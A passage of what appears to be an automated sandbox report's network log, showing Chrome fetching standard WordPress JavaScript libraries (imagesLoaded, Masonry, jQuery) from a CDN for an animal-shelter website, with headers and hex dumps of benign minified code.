                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 49 6d 61 67 65 73 28 74 29 3b 6c 65 74 7b 6e 6f 64 65 54 79 70 65 3a 65 7d 3d 74 3b 69 66 28 21 65 7c 7c 21 6f 2e 69 6e 63 6c 75 64 65 73 28 65 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 69 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 6d 67 22 29 3b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 69 29 74 68 69 73 2e 61 64 64 49 6d 61 67 65 28 74 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 62 61 63 6b 67 72 6f 75 6e 64 29 7b 6c 65 74 20 65 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 62 61 63 6b 67 72 6f 75 6e 64 29 3b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 65 29 74 68 69 73 2e 61 64 64 45 6c 65 6d 65 6e 74 42 61
                                                                                                                                                                                                                                                        Data Ascii: kgroundImages(t);let{nodeType:e}=t;if(!e||!o.includes(e))return;let i=t.querySelectorAll("img");for(let t of i)this.addImage(t);if("string"==typeof this.options.background){let e=t.querySelectorAll(this.options.background);for(let t of e)this.addElementBa
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 7b 6c 65 74 20 74 3d 74 68 69 73 2e 68 61 73 41 6e 79 42 72 6f 6b 65 6e 3f 22 66 61 69 6c 22 3a 22 64 6f 6e 65 22 3b 69 66 28 74 68 69 73 2e 69 73 43 6f 6d 70 6c 65 74 65 3d 21 30 2c 74 68 69 73 2e 65 6d 69 74 45 76 65 6e 74 28 74 2c 5b 74 68 69 73 5d 29 2c 74 68 69 73 2e 65 6d 69 74 45 76 65 6e 74 28 22 61 6c 77 61 79 73 22 2c 5b 74 68 69 73 5d 29 2c 74 68 69 73 2e 6a 71 44 65 66 65 72 72 65 64 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 68 61 73 41 6e 79 42 72 6f 6b 65 6e 3f 22 72 65 6a 65 63 74 22 3a 22 72 65 73 6f 6c 76 65 22 3b 74 68 69 73 2e 6a 71 44 65 66 65 72 72 65 64 5b 74 5d 28 74 68 69 73 29 7d 7d 2c 68 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 65 2e 70 72 6f 74 6f 74 79 70 65 29 2c 68 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                        Data Ascii: {let t=this.hasAnyBroken?"fail":"done";if(this.isComplete=!0,this.emitEvent(t,[this]),this.emitEvent("always",[this]),this.jqDeferred){let t=this.hasAnyBroken?"reject":"resolve";this.jqDeferred[t](this)}},h.prototype=Object.create(e.prototype),h.prototype
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC669INData Raw: 2c 74 68 69 73 29 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 68 2e 70 72 6f 74 6f 74 79 70 65 29 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 6d 67 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 6d 67 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 65 72 72 6f 72 22 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 6d 67 2e 73 72 63 3d 74 68 69 73 2e 75 72 6c 2c 74 68 69 73 2e 67 65 74 49 73 49 6d 61 67 65 43 6f 6d 70 6c 65 74 65 28 29 26 26 28 74 68 69 73 2e 63 6f 6e 66 69 72 6d 28 30 21 3d 3d 74 68 69 73 2e 69 6d 67 2e 6e 61 74 75 72 61 6c 57 69 64 74 68 2c 22 6e 61 74 75 72 61 6c 57 69 64
                                                                                                                                                                                                                                                        Data Ascii: ,this)},d.prototype=Object.create(h.prototype),d.prototype.check=function(){this.img.addEventListener("load",this),this.img.addEventListener("error",this),this.img.src=this.url,this.getIsImageComplete()&&(this.confirm(0!==this.img.naturalWidth,"naturalWid


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        22192.168.2.449774192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC566OUTGET /wp-includes/js/masonry.min.js?ver=4.2.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 24138
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/masonry.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sat, 13 Jun 2020 18:53:27 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC748INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 4d 61 73 6f 6e 72 79 20 50 41 43 4b 41 47 45 44 20 76 34 2e 32 2e 32 0a 20 2a 20 43 61 73 63 61 64 69 6e 67 20 67 72 69 64 20 6c 61 79 6f 75 74 20 6c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6d 61 73 6f 6e 72 79 2e 64 65 73 61 6e 64 72 6f 2e 63 6f 6d 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 20 62 79 20 44 61 76 69 64 20 44 65 53 61 6e 64 72 6f 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 6a 71 75 65 72 79 2d 62 72 69 64 67 65 74 2f 6a 71 75 65 72 79 2d
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated *//*! * Masonry PACKAGED v4.2.2 * Cascading grid layout library * https://masonry.desandro.com * MIT License * by David DeSandro */!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 20 30 21 3d 3d 6f 3f 6f 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 65 29 7b 74 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 6f 3d 61 2e 64 61 74 61 28 6e 2c 69 29 3b 6f 3f 28 6f 2e 6f 70 74 69 6f 6e 28 65 29 2c 6f 2e 5f 69 6e 69 74 28 29 29 3a 28 6f 3d 6e 65 77 20 72 28 6e 2c 65 29 2c 61 2e 64 61 74 61 28 6e 2c 69 2c 6f 29 29 7d 29 7d 61 3d 61 7c 7c 65 7c 7c 74 2e 6a 51 75 65 72 79 2c 61 26 26 28 72 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 70 74 69 6f 6e 7c 7c 28 72 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 61 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 74 29 26 26 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 61 2e 65 78 74 65 6e 64 28 21 30 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c
                                                                                                                                                                                                                                                        Data Ascii: 0!==o?o:t}function u(t,e){t.each(function(t,n){var o=a.data(n,i);o?(o.option(e),o._init()):(o=new r(n,e),a.data(n,i,o))})}a=a||e||t.jQuery,a&&(r.prototype.option||(r.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.options,
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 2e 6f 66 66 28 74 2c 72 29 2c 64 65 6c 65 74 65 20 6e 5b 72 5d 29 2c 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 65 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 2c 65 2e 61 6c 6c 4f 66 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 74 68 69 73 2e 5f 65 76 65 6e 74 73 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 5f 6f 6e 63 65 45 76 65 6e 74 73 7d 2c 74 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 67 65 74 2d 73 69 7a 65 2f 67 65 74 2d 73 69 7a 65 22 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f
                                                                                                                                                                                                                                                        Data Ascii: .off(t,r),delete n[r]),r.apply(this,e)}return this}},e.allOff=function(){delete this._events,delete this._onceEvents},t}),function(t,e){"function"==typeof define&&define.amd?define("get-size/get-size",e):"object"==typeof module&&module.exports?module.expo
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 4e 28 6d 29 3f 30 3a 6d 7d 76 61 72 20 70 3d 61 2e 70 61 64 64 69 6e 67 4c 65 66 74 2b 61 2e 70 61 64 64 69 6e 67 52 69 67 68 74 2c 67 3d 61 2e 70 61 64 64 69 6e 67 54 6f 70 2b 61 2e 70 61 64 64 69 6e 67 42 6f 74 74 6f 6d 2c 79 3d 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2b 61 2e 6d 61 72 67 69 6e 52 69 67 68 74 2c 76 3d 61 2e 6d 61 72 67 69 6e 54 6f 70 2b 61 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 2c 5f 3d 61 2e 62 6f 72 64 65 72 4c 65 66 74 57 69 64 74 68 2b 61 2e 62 6f 72 64 65 72 52 69 67 68 74 57 69 64 74 68 2c 7a 3d 61 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 2b 61 2e 62 6f 72 64 65 72 42 6f 74 74 6f 6d 57 69 64 74 68 2c 45 3d 64 26 26 73 2c 62 3d 74 28 72 2e 77 69 64 74 68 29 3b 62 21 3d 3d 21 31 26 26 28 61 2e 77 69 64 74 68 3d 62 2b 28 45 3f 30 3a
                                                                                                                                                                                                                                                        Data Ascii: N(m)?0:m}var p=a.paddingLeft+a.paddingRight,g=a.paddingTop+a.paddingBottom,y=a.marginLeft+a.marginRight,v=a.marginTop+a.marginBottom,_=a.borderLeftWidth+a.borderRightWidth,z=a.borderTopWidth+a.borderBottomWidth,E=d&&s,b=t(r.width);b!==!1&&(a.width=b+(E?0:
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 74 2c 72 65 71 75 69 72 65 28 22 64 65 73 61 6e 64 72 6f 2d 6d 61 74 63 68 65 73 2d 73 65 6c 65 63 74 6f 72 22 29 29 3a 74 2e 66 69 7a 7a 79 55 49 55 74 69 6c 73 3d 65 28 74 2c 74 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 29 7d 28 77 69 6e 64 6f 77 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 3d 7b 7d 3b 69 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 65 29 74 5b 69 5d 3d 65 5b 69 5d 3b 72 65 74 75 72 6e 20 74 7d 2c 69 2e 6d 6f 64 75 6c 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 28
                                                                                                                                                                                                                                                        Data Ascii: :"object"==typeof module&&module.exports?module.exports=e(t,require("desandro-matches-selector")):t.fizzyUIUtils=e(t,t.matchesSelector)}(window,function(t,e){var i={};i.extend=function(t,e){for(var i in e)t[i]=e[i];return t},i.modulo=function(t,e){return(
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6f 44 61 73 68 65 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 2f 28 2e 29 28 5b 41 2d 5a 5d 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 72 65 74 75 72 6e 20 65 2b 22 2d 22 2b 69 7d 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 3b 76 61 72 20 6f 3d 74 2e 63 6f 6e 73 6f 6c 65 3b 72 65 74 75 72 6e 20 69 2e 68 74 6d 6c 49 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 2e 64 6f 63 52 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 69 2e 74 6f 44 61 73 68 65 64 28 6e 29 2c 73 3d 22 64 61 74 61 2d 22 2b 72 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 22 2b 73 2b 22 5d 22 29 2c 68 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72
                                                                                                                                                                                                                                                        Data Ascii: oDashed=function(t){return t.replace(/(.)([A-Z])/g,function(t,e,i){return e+"-"+i}).toLowerCase()};var o=t.console;return i.htmlInit=function(e,n){i.docReady(function(){var r=i.toDashed(n),s="data-"+r,a=document.querySelectorAll("["+s+"]"),h=document.quer
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6f 6e 44 75 72 61 74 69 6f 6e 3a 73 2b 22 44 75 72 61 74 69 6f 6e 22 2c 74 72 61 6e 73 69 74 69 6f 6e 50 72 6f 70 65 72 74 79 3a 73 2b 22 50 72 6f 70 65 72 74 79 22 2c 74 72 61 6e 73 69 74 69 6f 6e 44 65 6c 61 79 3a 73 2b 22 44 65 6c 61 79 22 7d 2c 64 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 3b 64 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 2c 64 2e 5f 63 72 65 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 74 72 61 6e 73 6e 3d 7b 69 6e 67 50 72 6f 70 65 72 74 69 65 73 3a 7b 7d 2c 63 6c 65 61 6e 3a 7b 7d 2c 6f 6e 45 6e 64 3a 7b 7d 7d 2c 74 68 69 73 2e 63 73 73 28 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 7d 29 7d 2c 64 2e 68 61 6e 64 6c 65 45 76 65
                                                                                                                                                                                                                                                        Data Ascii: onDuration:s+"Duration",transitionProperty:s+"Property",transitionDelay:s+"Delay"},d=n.prototype=Object.create(t.prototype);d.constructor=n,d._create=function(){this._transn={ingProperties:{},clean:{},onEnd:{}},this.css({position:"absolute"})},d.handleEve
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 69 6f 6e 28 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 61 79 6f 75 74 2e 6f 70 74 69 6f 6e 73 2e 70 65 72 63 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 21 65 3f 74 2f 74 68 69 73 2e 6c 61 79 6f 75 74 2e 73 69 7a 65 2e 77 69 64 74 68 2a 31 30 30 2b 22 25 22 3a 74 2b 22 70 78 22 7d 2c 64 2e 67 65 74 59 56 61 6c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6c 61 79 6f 75 74 2e 5f 67 65 74 4f 70 74 69 6f 6e 28 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 61 79 6f 75 74 2e 6f 70 74 69 6f 6e 73 2e 70 65 72 63 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 65 3f 74 2f 74 68 69 73 2e 6c 61 79 6f 75 74 2e 73 69 7a 65 2e 68 65 69 67 68 74 2a 31 30 30 2b 22 25 22 3a 74 2b
                                                                                                                                                                                                                                                        Data Ascii: ion("horizontal");return this.layout.options.percentPosition&&!e?t/this.layout.size.width*100+"%":t+"px"},d.getYValue=function(t){var e=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&e?t/this.layout.size.height*100+"%":t+
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 61 6e 5b 69 5d 3d 21 30 29 3b 69 66 28 74 2e 66 72 6f 6d 29 7b 74 68 69 73 2e 63 73 73 28 74 2e 66 72 6f 6d 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 3b 6e 3d 6e 75 6c 6c 7d 74 68 69 73 2e 65 6e 61 62 6c 65 54 72 61 6e 73 69 74 69 6f 6e 28 74 2e 74 6f 29 2c 74 68 69 73 2e 63 73 73 28 74 2e 74 6f 29 2c 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 21 30 7d 3b 76 61 72 20 6c 3d 22 6f 70 61 63 69 74 79 2c 22 2b 6f 28 61 29 3b 64 2e 65 6e 61 62 6c 65 54 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 61 79 6f 75 74 2e 6f 70 74 69 6f 6e 73 2e 74 72 61 6e 73 69
                                                                                                                                                                                                                                                        Data Ascii: an[i]=!0);if(t.from){this.css(t.from);var n=this.element.offsetHeight;n=null}this.enableTransition(t.to),this.css(t.to),this.isTransitioning=!0};var l="opacity,"+o(a);d.enableTransition=function(){if(!this.isTransitioning){var t=this.layout.options.transi
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 63 73 73 28 7b 64 69 73 70 6c 61 79 3a 22 22 7d 29 2c 74 68 69 73 2e 65 6d 69 74 45 76 65 6e 74 28 22 72 65 6d 6f 76 65 22 2c 5b 74 68 69 73 5d 29 7d 2c 64 2e 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 26 26 70 61 72 73 65 46 6c 6f 61 74 28 74 68 69 73 2e 6c 61 79 6f 75 74 2e 6f 70 74 69 6f 6e 73 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 29 3f 28 74 68 69 73 2e 6f 6e 63 65 28 22 74 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 6c 65 6d 28 29 7d 29 2c 76 6f 69 64 20 74 68 69 73 2e 68
                                                                                                                                                                                                                                                        Data Ascii: his.element.parentNode.removeChild(this.element),this.css({display:""}),this.emitEvent("remove",[this])},d.remove=function(){return s&&parseFloat(this.layout.options.transitionDuration)?(this.once("transitionEnd",function(){this.removeElem()}),void this.h


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        23192.168.2.449771192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC398OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 87553
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/jquery.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 28 Aug 2023 17:14:23 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC742INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                        Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 65 3d 3d 3d 65 2e 77 69 6e 64 6f 77 7d 2c 43 3d 69 65 2e 64 6f 63 75 6d 65 6e 74 2c 75 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 28 6e 3d 6e 7c 7c 43 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 75 29 28 69 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 69 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d
                                                                                                                                                                                                                                                        Data Ascii: e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.rem
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 6e 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 73 2c 73 6f 72 74 3a 6f 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 6f 65 2e 73 70 6c 69 63 65 7d 2c 63 65 2e 65 78 74 65 6e 64 3d 63 65 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67
